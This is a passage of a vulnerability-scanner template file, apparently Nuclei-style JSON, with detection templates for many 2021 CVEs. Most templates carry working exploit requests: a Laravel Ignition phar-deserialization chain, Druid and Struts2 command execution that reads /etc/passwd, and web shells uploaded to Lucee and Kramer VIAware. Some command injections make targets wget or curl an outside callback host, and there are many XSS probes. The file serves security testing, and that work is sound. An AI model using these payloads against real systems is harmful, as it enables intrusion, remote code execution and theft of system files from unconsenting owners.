application/x-www-form-urlencoded\n\nsettingsform[mail]=pdteam'+onclick='alert(document.domain)\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["onclick='alert(document.domain)","Spotweb"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-3129","info":{"name":"Laravel with Ignition <= v8.4.2 Debug Mode - Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST /_ignition/execute-solution HTTP/1.1\nHost: {{Hostname}}\nAccept: application/json\nContent-Type: application/json\n\n{\"solution\": \"Facade\\\\Ignition\\\\Solutions\\\\MakeViewVariableOptionalSolution\", \"parameters\": {\"variableName\": \"cve20213129\", \"viewFile\": \"php://filter/write=convert.iconv.utf-8.utf-16be|convert.quoted-printable-encode|convert.iconv.utf-16be.utf-8|convert.base64-decode/resource=../storage/logs/laravel.log\"}}\n","POST /_ignition/execute-solution HTTP/1.1\nHost: {{Hostname}}\nAccept: application/json\nContent-Type: application/json\n\n{\"solution\": \"Facade\\\\Ignition\\\\Solutions\\\\MakeViewVariableOptionalSolution\", \"parameters\": {\"variableName\": \"cve20213129\", \"viewFile\": \"php://filter/write=convert.iconv.utf-8.utf-16be|convert.quoted-printable-encode|convert.iconv.utf-16be.utf-8|convert.base64-decode/resource=../storage/logs/laravel.log\"}}\n","POST /_ignition/execute-solution HTTP/1.1\nHost: {{Hostname}}\nAccept: application/json\nContent-Type: application/json\n\n{\"solution\": \"Facade\\\\Ignition\\\\Solutions\\\\MakeViewVariableOptionalSolution\", \"parameters\": {\"variableName\": \"cve20213129\", \"viewFile\": \"AA\"}}\n","POST /_ignition/execute-solution HTTP/1.1\nHost: {{Hostname}}\nAccept: application/json\nContent-Type: application/json\n\n{\"solution\": \"Facade\\\\Ignition\\\\Solutions\\\\MakeViewVariableOptionalSolution\", \"parameters\": {\"variableName\": \"cve20213129\", \"viewFile\": \"=50=00=44=00=39=00=77=00=61=00=48=00=41=00=67=00=58=00=31=00=39=00=49=00=51=00=55=00=78=00=55=00=58=00=30=00=4E=00=50=00=54=00=56=00=42=00=4A=00=54=00=45=00=56=00=53=00=4B=00=43=00=6B=00=37=00=49=00=44=00=38=00=2B=00=44=00=51=00=6F=00=4C=00=41=00=51=00=41=00=41=00=41=00=67=00=41=00=41=00=41=00=42=00=45=00=41=00=41=00=41=00=41=00=42=00=41=00=41=00=41=00=41=00=41=00=41=00=43=00=7A=00=41=00=41=00=41=00=41=00=54=00=7A=00=6F=00=30=00=4D=00=44=00=6F=00=69=00=53=00=57=00=78=00=73=00=64=00=57=00=31=00=70=00=62=00=6D=00=46=00=30=00=5A=00=56=00=78=00=43=00=63=00=6D=00=39=00=68=00=5A=00=47=00=4E=00=68=00=63=00=33=00=52=00=70=00=62=00=6D=00=64=00=63=00=55=00=47=00=56=00=75=00=5A=00=47=00=6C=00=75=00=5A=00=30=00=4A=00=79=00=62=00=32=00=46=00=6B=00=59=00=32=00=46=00=7A=00=64=00=43=00=49=00=36=00=4D=00=6A=00=70=00=37=00=63=00=7A=00=6F=00=35=00=4F=00=69=00=49=00=41=00=4B=00=67=00=42=00=6C=00=64=00=6D=00=56=00=75=00=64=00=48=00=4D=00=69=00=4F=00=30=00=38=00=36=00=4D=00=7A=00=45=00=36=00=49=00=6B=00=6C=00=73=00=62=00=48=00=56=00=74=00=61=00=57=00=35=00=68=00=64=00=47=00=56=00=63=00=56=00=6D=00=46=00=73=00=61=00=57=00=52=00=68=00=64=00=47=00=6C=00=76=00=62=00=6C=00=78=00=57=00=59=00=57=00=78=00=70=00=5A=00=47=00=46=00=30=00=62=00=33=00=49=00=69=00=4F=00=6A=00=45=00=36=00=65=00=33=00=4D=00=36=00=4D=00=54=00=41=00=36=00=49=00=6D=00=56=00=34=00=64=00=47=00=56=00=75=00=63=00=32=00=6C=00=76=00=62=00=6E=00=4D=00=69=00=4F=00=32=00=45=00=36=00=4D=00=54=00=70=00=37=00=63=00=7A=00=6F=00=77=00=4F=00=69=00=49=00=69=00=4F=00=33=00=4D=00=36=00=4E=00=6A=00=6F=00=69=00=63=00=33=00=6C=00=7A=00=64=00=47=00=56=00=74=00=49=00=6A=00=74=00=39=00=66=00=58=00=4D=00=36=00=4F=00=44=00=6F=00=69=00=41=00=43=00=6F=00=41=00=5A=00=58=00=5A=00=6C=00=62=00=6E=00=51=00=69=00=4F=00=33=00=4D=00=36=00=4D=00=6A=00=6F=00=69=00=61=00=57=00=51=00=69=00=4F=00=33=00=30=00=46=00=41=00=41=00=41=00=41=00=5A=00=48=00=56=00=74=00=62=00=58=00=6B=00=45=00=41=00=41=00=41=00=41=00=58=00=73=00=7A=00=6F=00=59=00=41=00=51=00=41=00=41=00=41=00=41=00=4D=00=66=00=6E=00=2F=00=59=00=70=00=41=00=45=00=41=00=41=00=41=00=41=00=41=00=41=00=41=00=41=00=49=00=41=00=41=00=41=00=41=00=64=00=47=00=56=00=7A=00=64=00=43=00=35=00=30=00=65=00=48=00=51=00=45=00=41=00=41=00=41=00=41=00=58=00=73=00=7A=00=6F=00=59=00=41=00=51=00=41=00=41=00=41=00=41=00=4D=00=66=00=6E=00=2F=00=59=00=70=00=41=00=45=00=41=00=41=00=41=00=41=00=41=00=41=00=41=00=43=00=7A=00=64=00=47=00=56=00=7A=00=64=00=48=00=52=00=6C=00=63=00=33=00=51=00=63=00=4A=00=39=00=59=00=36=00=5A=00=6B=00=50=00=61=00=39=00=61=00=45=00=49=00=51=00=49=00=45=00=47=00=30=00=6B=00=4A=00=2B=00=39=00=4A=00=50=00=6B=00=4C=00=67=00=49=00=41=00=41=00=41=00=42=00=48=00=51=00=6B=00=31=00=43=00a\"}}\n","POST /_ignition/execute-solution HTTP/1.1\nHost: {{Hostname}}\nAccept: application/json\nContent-Type: application/json\n\n{\"solution\": \"Facade\\\\Ignition\\\\Solutions\\\\MakeViewVariableOptionalSolution\", \"parameters\": {\"variableName\": \"cve20213129\", \"viewFile\": \"php://filter/write=convert.quoted-printable-decode|convert.iconv.utf-16le.utf-8|convert.base64-decode/resource=../storage/logs/laravel.log\"}}\n","POST /_ignition/execute-solution HTTP/1.1\nHost: {{Hostname}}\nAccept: application/json\nContent-Type: application/json\n\n{\"solution\": \"Facade\\\\Ignition\\\\Solutions\\\\MakeViewVariableOptionalSolution\", \"parameters\": {\"variableName\": \"cve20213129\", \"viewFile\": \"phar://../storage/logs/laravel.log/test.txt\"}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["uid=","gid=","groups=","Illuminate"],"condition":"and"},{"type":"status","status":[500]}],"extractors":[{"type":"regex","regex":["(u|g)id=.*"]}]}]},{"id":"CVE-2021-24495","info":{"name":"Wordpress Marmoset Viewer <1.9.3 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/marmoset-viewer/mviewer.php?id=http://</script><svg/onload=alert(%27{{randstr}}%27)>","{{BaseURL}}/wp-content/plugins/marmoset-viewer/mviewer.php?id=1+http://a.com%27);alert(/{{randstr}}/);marmoset.embed(%27a"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><svg/onload=alert('{{randstr}}')>","alert(/{{randstr}}/)"],"condition":"or"},{"type":"word","words":["Marmoset Viewer"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-24746","info":{"name":"WordPress Sassy Social Share Plugin <3.3.40 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-json/wp/v2/posts","{{BaseURL}}/{{slug}}/?a&quot;&gt;&lt;script&gt;alert(document.domain)&lt;/script&gt;"],"host-redirects":true,"max-redirects":2,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["?a\"><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}],"extractors":[{"type":"regex","name":"slug","group":1,"regex":["\"slug\":\"([_a-z-A-Z0-9]+)\","],"internal":true,"part":"body"}]}]},{"id":"CVE-2021-24452","info":{"name":"WordPress W3 Total Cache <2.1.5 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/admin.php?page=w3tc_extensions&extension='-alert(document.domain)-' HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(body_2, 'extensions/\\'-alert(document.domain)-\\'') && contains(body_2, 'w3-total-cache')","contains(header_2, \"text/html\")"],"condition":"and"}]}]},{"id":"CVE-2021-29622","info":{"name":"Prometheus  - Open Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/new/newhttp://interact.sh"],"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh.*$"]}]}]},{"id":"CVE-2021-30213","info":{"name":"Knowage Suite 7.3 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/knowage/servlet/AdapterHTTP?Page=LoginPage&NEW_SESSION=TRUE&TargetService=%2Fknowage%2Fservlet%2FAdapterHTTP%3FPage%3DLoginPage%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-22005","info":{"name":"VMware vCenter Server - Arbitrary File Upload","severity":"critical"},"requests":[{"raw":["GET / HTTP/1.1\nHost: {{Hostname}}\n","POST /analytics/telemetry/ph/api/hyper/send?_c&_i=test HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json\n\ntest_data\n"],"matchers":[{"type":"dsl","dsl":["status_code_1 == 200","status_code_2 == 201","contains(body_1, 'VMware vSphere')","content_length_2 == 0"],"condition":"and"}]}]},{"id":"CVE-2021-41878","info":{"name":"i-Panel Administration System 2.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/lostpassword.php/n4gap%22%3E%3Cimg%20src=a%20onerror=alert(%22document.domain%22)%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["><img src=a onerror=alert(\"document.domain\")>","i-Panel Administration"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-44152","info":{"name":"Reprise License Manager 14.2 - Authentication Bypass","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/goforms/menu"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["RLM Administration Commands"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-38146","info":{"name":"Wipro Holmes Orchestrator 20.4.1 - Arbitrary File Download","severity":"high"},"requests":[{"method":"POST","path":["{{BaseURL}}/home/download"],"headers":{"Content-Type":"application/json"},"body":"{\n  \"SearchString\": \"C:/Windows/Win.ini\",\n  \"Msg\": \"\"\n}\n","matchers-condition":"and","matchers":[{"type":"word","words":["[fonts]","[extensions]","[files]"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-24979","info":{"name":"Paid Memberships Pro < 2.6.6 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/admin.php?page=pmpro-discountcodes&s=s\"+style=animation-name:rotation+onanimationstart=alert(document.domain)// HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(header_2, \"text/html\")","contains(body_2, \"style=animation-name:rotation+onanimationstart=alert(document.domain)//\")","contains(body_2, \"Paid Memberships Pro - Membership Plugin for WordPress\")"],"condition":"and"}]}]},{"id":"CVE-2021-25646","info":{"name":"Apache Druid - Remote Code Execution","severity":"high"},"requests":[{"raw":["POST /druid/indexer/v1/sampler HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json\n\n{\n\"type\":\"index\",\n\"spec\":{\n   \"ioConfig\":{\n      \"type\":\"index\",\n      \"firehose\":{\n         \"type\":\"local\",\n         \"baseDir\":\"/etc\",\n         \"filter\":\"passwd\"\n      }\n   },\n   \"dataSchema\":{\n      \"dataSource\":\"odgjxrrrePz\",\n      \"parser\":{\n         \"parseSpec\":{\n            \"format\":\"javascript\",\n            \"timestampSpec\":{\n\n            },\n            \"dimensionsSpec\":{\n\n            },\n            \"function\":\"function(){var hTVCCerYZ = new java.util.Scanner(java.lang.Runtime.getRuntime().exec(\\\"/bin/sh`@~-c`@~cat /etc/passwd\\\".split(\\\"`@~\\\")).getInputStream()).useDelimiter(\\\"\\\\A\\\").next();return {timestamp:\\\"4137368\\\",OQtGXcxBVQVL: hTVCCerYZ}}\",\n            \"\":{\n               \"enabled\":\"true\"\n            }\n         }\n      }\n   }\n},\n\"samplerConfig\":{\n   \"numRows\":10\n}\n}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["numRowsRead","numRowsIndexed"],"condition":"and"},{"type":"word","part":"header","words":["application/json"]},{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-24472","info":{"name":"Onair2 < 3.9.9.2 & KenthaRadio < 2.0.2 - Remote File Inclusion/Server-Side Request Forgery","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp1/home-18/?qtproxycall=https://oast.me"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<h1> Interactsh Server </h1>"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-32819","info":{"name":"Nodejs Squirrelly - Remote Code Execution","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/?Express=aaaa&autoEscape=&defaultFilter=e%27);var+require=global.require+%7C%7C+global.process.mainModule.constructor._load;+require(%27child_process%27).exec(%27wget%20http://{{interactsh-url}}%27);//"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]},{"type":"word","part":"interactsh_request","words":["User-Agent: Wget"]}]}]},{"id":"CVE-2021-24226","info":{"name":"AccessAlly <3.5.7 - Sensitive Information Leakage","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<div id=\"accessally-testing-data\""],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-40323","info":{"name":"Cobbler <3.3.0 - Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST {{BaseURL}}/cobbler_api HTTP/1.1\nHost: {{Hostname}}\nContent-Type: text/xml\n\n<?xml version='1.0'?>\n<methodCall>\n  <methodName>find_profile</methodName>\n  <params>\n    <param>\n      <value>\n        <struct>\n          <member>\n            <name>name</name>\n            <value>\n              <string>*</string>\n            </value>\n          </member>\n        </struct>\n      </value>\n    </param>\n  </params>\n</methodCall>\n","POST {{BaseURL}}/cobbler_api HTTP/1.1\nHost: {{Hostname}}\nContent-Type: text/xml\n\n<?xml version='1.0'?>\n<methodCall>\n  <methodName>generate_script</methodName>\n  <params>\n    <param>\n      <value>\n        <string>{{profile}}</string>\n      </value>\n    </param>\n    <param>\n      <value>\n        <string></string>\n      </value>\n    </param>\n    <param>\n      <value>\n        <string>/etc/passwd</string>\n      </value>\n    </param>\n  </params>\n</methodCall>\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["text/xml"]},{"type":"regex","regex":["root:.*:0","bin:.*:1","nobody:.*:99"],"condition":"or"},{"type":"status","status":[200]}],"extractors":[{"type":"regex","name":"profile","group":1,"regex":["<value><string>(.*?)</string></value>"],"internal":true}]}]},{"id":"CVE-2021-25063","info":{"name":"WordPress Contact Form 7 Skins <=2.5.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{RootURL}}\nContent-Type: application/x-www-form-urlencoded\nCookie: wordpress_test_cookie=WP%20Cookie%20check\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1\n","GET /wp-admin/admin.php?page=cf7skins&tab=%27%3E%3Cimg+src+onerror%3Dalert%28document.domain%29%3E HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<img src onerror=alert(document.domain)>' type='hidden"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-21972","info":{"name":"VMware vSphere Client (HTML5) - Remote Code Execution","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/ui/vropspluginui/rest/services/getstatus"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["VSPHERE-UI-JSESSIONID"],"condition":"and"},{"type":"regex","part":"body","regex":["(Install|Config) Final Progress"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-24364","info":{"name":"WordPress Jannah Theme <5.4.4 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET / HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"word","internal":true,"words":["/wp-content/themes/jannah/assets/","attachment-jannah-image-"],"condition":"or"}]},{"method":"GET","path":["{{BaseURL}}/wp-admin/admin-ajax.php?action=tie_get_user_weather&options=%7B%27location%27%3A%27Cairo%27%2C%27units%27%3A%27C%27%2C%27forecast_days%27%3A%275%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3Ecustom_name%27%3A%27Cairo%27%2C%27animated%27%3A%27true%27%7D"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-31805","info":{"name":"Apache Struts2 S2-062 - Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST / HTTP/1.1\nHost: {{Hostname}}\nContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryl7d1B1aGsV2wcZwF\nContent-Length: 1095\n\n------WebKitFormBoundaryl7d1B1aGsV2wcZwF\nContent-Disposition: form-data; name=\"id\"\n\n%{\n(#request.map=#@org.apache.commons.collections.BeanMap@{}).toString().substring(0,0) +\n(#request.map.setBean(#request.get('struts.valueStack')) == true).toString().substring(0,0) +\n(#request.map2=#@org.apache.commons.collections.BeanMap@{}).toString().substring(0,0) +\n(#request.map2.setBean(#request.get('map').get('context')) == true).toString().substring(0,0) +\n(#request.map3=#@org.apache.commons.collections.BeanMap@{}).toString().substring(0,0) +\n(#request.map3.setBean(#request.get('map2').get('memberAccess')) == true).toString().substring(0,0) +\n(#request.get('map3').put('excludedPackageNames',#@org.apache.commons.collections.BeanMap@{}.keySet()) == true).toString().substring(0,0) +\n(#request.get('map3').put('excludedClasses',#@org.apache.commons.collections.BeanMap@{}.keySet()) == true).toString().substring(0,0) +\n(#application.get('org.apache.tomcat.InstanceManager').newInstance('freemarker.template.utility.Execute').exec({'cat /etc/passwd'}))\n}\n\n------WebKitFormBoundaryl7d1B1aGsV2wcZwF\u2014\n"],"matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]}]}]},{"id":"CVE-2021-21389","info":{"name":"BuddyPress REST API  <7.2.1 - Privilege Escalation/Remote Code Execution","severity":"high"},"requests":[{"raw":["POST /wp-json/buddypress/v1/signup HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json; charset=UTF-8\n\n{\n  \"user_login\":\"{{randstr}}\",\n  \"password\":\"{{randstr}}\",\n  \"user_name\":\"{{randstr}}\",\n  \"user_email\":\"{{randstr}}@interact.sh\"\n}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["user_login","registered","activation_key","user_email"],"condition":"and"},{"type":"word","part":"header","words":["application/json"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-21307","info":{"name":"Lucee Admin - Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST /lucee/admin/imgProcess.cfm?file=/whatever HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nimgSrc=a\n","POST /lucee/admin/imgProcess.cfm?file=/../../../context/{{randstr}}.cfm HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nimgSrc=\n<cfoutput>\n\n<table>\n<form method=\"POST\" action=\"\">\n<tr><td>Command:</td><td><input type=test name=\"cmd\" size=50\n<cfif isdefined(\"form.cmd\")>value=\"#form.cmd#\"</cfif>><br></td></tr>\n<tr><td>Options:</td><td> <input type=text name=\"opts\" size=50\n<cfif isdefined(\"form.opts\")>value=\"#form.opts#\"</cfif>><br></td></tr>\n<tr><td>Timeout:</td><td> <input type=text name=\"timeout\" size=4\n<cfif isdefined(\"form.timeout\")>value=\"#form.timeout#\"\n<cfelse> value=\"5\"</cfif>></td></tr>\n</table>\n<input type=submit value=\"Exec\" >\n</form>\n<cfif isdefined(\"form.cmd\")>\n<cfsavecontent variable=\"myVar\">\n<cfexecute name = \"#Form.cmd#\"\narguments = \"#Form.opts#\"\ntimeout = \"#Form.timeout#\">\n</cfexecute>\n</cfsavecontent>\n<pre>\n","POST /lucee/{{randstr}}.cfm HTTP/1.1\nHost: {{Hostname}}\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\nContent-Type: application/x-www-form-urlencoded\n\ncmd=id&opts=&timeout=5\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["uid=","gid=","groups="],"condition":"and"},{"type":"status","status":[200]}],"extractors":[{"type":"regex","regex":["(u|g)id=.*"]}]}]},{"id":"CVE-2021-25065","info":{"name":"Smash Balloon Social Post Feed < 4.1.1 - Authenticated Reflected Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/admin.php?page=cff-top&cff_access_token=xox%3C%2Fscript%3E%3Cimg+src+onerror%3Dalert(document.domain)%3E&cff_final_response=true HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(body_2, \"<img src onerror=alert(document.domain)>\")","contains(body_2, \"custom-facebook-feed\")"],"condition":"and"}]}]},{"id":"CVE-2021-44260","info":{"name":"WAVLINK AC1200 - Information Disclosure","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/live_mfg.html"],"matchers":[{"type":"dsl","dsl":["contains_all(body, \"Model=\", \"FW_Version=\", \"LAN_MAC=\", \"Brand=\")","status_code == 200"],"condition":"and"}]}]},{"id":"CVE-2021-20167","info":{"name":"Netgear RAX43 1.0.3.96 - Command Injection/Authentication Bypass Buffer Overrun","severity":"high"},"requests":[{"raw":["POST /cgi-bin/readycloud_control.cgi?1111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111/api/users HTTP/1.1\nHost: {{Hostname}}\n\n\"name\":\"';$(curl {{interactsh-url}});'\",\n\"email\":\"a@b.c\"\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]},{"type":"word","part":"interactsh_request","words":["User-Agent: curl"]}]}]},{"id":"CVE-2021-22873","info":{"name":"Revive Adserver <5.1.0 - Open Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/ads/www/delivery/lg.php?dest=http://interact.sh","{{BaseURL}}/adserve/www/delivery/lg.php?dest=http://interact.sh","{{BaseURL}}/adserver/www/delivery/lg.php?dest=http://interact.sh","{{BaseURL}}/openx/www/delivery/lg.php?dest=http://interact.sh","{{BaseURL}}/revive/www/delivery/lg.php?dest=http://interact.sh","{{BaseURL}}/www/delivery/lg.php?dest=http://interact.sh"],"stop-at-first-match":true,"host-redirects":true,"max-redirects":2,"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?:\\/\\/|\\/\\/|\\/\\\\\\\\|\\/\\\\)(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh\\/?(\\/|[^.].*)?$"]}]}]},{"id":"CVE-2021-31682","info":{"name":"WebCTRL OEM <= 6.5 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.jsp?operatorlocale=%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"><script>alert(document.domain)</script>","common/lvl5"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-28151","info":{"name":"Hongdian H8922 3.0.5 - Remote Command Injection","severity":"high"},"requests":[{"raw":["POST /tools.cgi HTTP/1.1\nHost: {{Hostname}}\nAuthorization: Basic Z3Vlc3Q6Z3Vlc3Q=\nOrigin: {{BaseURL}}\nReferer: {{BaseURL}}/tools.cgi\n\nop_type=ping&destination=%3Bid\n","POST /tools.cgi HTTP/1.1\nHost: {{Hostname}}\nAuthorization: Basic YWRtaW46YWRtaW4=\nOrigin: {{BaseURL}}\nReferer: {{BaseURL}}/tools.cgi\n\nop_type=ping&destination=%3Bid\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["text/html","application/x-www-form-urlencoded"],"condition":"or"},{"type":"regex","regex":["uid=\\d+\\(([^)]+)\\) gid=\\d+\\(([^)]+)\\)"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-3577","info":{"name":"Motorola Baby Monitors - Remote Command Execution","severity":"high"},"requests":[{"raw":["GET /?action=command&command=set_city_timezone&value=$(wget%20http://{{interactsh-url}})) HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]},{"type":"word","words":["set_city_timezone"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-24150","info":{"name":"WordPress Like Button Rating <2.6.32 - Server-Side Request Forgery","severity":"high"},"requests":[{"raw":["@timeout: 10s\nGET /wp-admin/admin-ajax.php?action=likebtn_prx&likebtn_q={{base64('http://likebtn.com.oast.me')}}\" HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["Interactsh Server"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-36356","info":{"name":"Kramer VIAware - Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST /ajaxPages/writeBrowseFilePathAjax.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nradioBtnVal=%3C%3Fphp%0A++++++++if%28isset%28%24_GET%5B%27cmd%27%5D%29%29%0A++++++++%7B%0A++++++++++++system%28%24_GET%5B%27cmd%27%5D%29%3B%0A++++++++%7D%3F%3E&associateFileName=%2Fvar%2Fwww%2Fhtml%2F{{randstr}}.php\n","GET /{{randstr}}.php?cmd=sudo+rpm+--eval+'%25{lua%3aos.execute(\"curl+http%3a//{{interactsh-url}}+-H+'User-Agent%3a+{{useragent}}'\")}' HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]},{"type":"word","part":"interactsh_request","words":["User-Agent: {{useragent}}"]}]}]},{"id":"CVE-2021-41266","info":{"name":"MinIO Operator Console Authentication Bypass","severity":"critical"},"requests":[{"raw":["POST /api/v1/login/oauth2/auth HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\nContent-Type: application/json\n\n{\"code\":\"test\",\"state\":\"test\"}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["sessionId"]},{"type":"word","part":"header","words":["token"]},{"type":"status","status":[201,200],"condition":"or"}]}]},{"id":"CVE-2021-40875","info":{"name":"Gurock TestRail Application files.md5 Exposure","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/files.md5","{{BaseURL}}/testrail/files.md5"],"stop-at-first-match":true,"max-size":1000,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["app/arguments/admin"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-40539","info":{"name":"Zoho ManageEngine ADSelfService Plus v6113 - Unauthenticated Remote Command Execution","severity":"critical"},"requests":[{"raw":["POST /./RestAPI/LogonCustomization HTTP/1.1\nHost: {{Hostname}}\nContent-Type: multipart/form-data; boundary=8b1ab266c41afb773af2e064bc526458\n\n--8b1ab266c41afb773af2e064bc526458\nContent-Disposition: form-data; name=\"methodToCall\"\n\nunspecified\n--8b1ab266c41afb773af2e064bc526458\nContent-Disposition: form-data; name=\"Save\"\n\nyes\n--8b1ab266c41afb773af2e064bc526458\nContent-Disposition: form-data; name=\"form\"\n\nsmartcard\n--8b1ab266c41afb773af2e064bc526458\nContent-Disposition: form-data; name=\"operation\"\n\nAdd\n--8b1ab266c41afb773af2e064bc526458\nContent-Disposition: form-data; name=\"CERTIFICATE_PATH\"; filename=\"ws.jsp\"\n\n<%@ page import=\"java.util.*,java.io.*\"%>\n<%@ page import=\"java.security.MessageDigest\"%>\n<%\nString cve = \"CVE-2021-40539\";\nMessageDigest alg = MessageDigest.getInstance(\"MD5\");\nalg.reset();\nalg.update(cve.getBytes());\nbyte[] digest = alg.digest();\nStringBuffer hashedpasswd = new StringBuffer();\nString hx;\nfor (int i=0;i<digest.length;i++){\n  hx =  Integer.toHexString(0xFF & digest[i]);\n  if(hx.length() 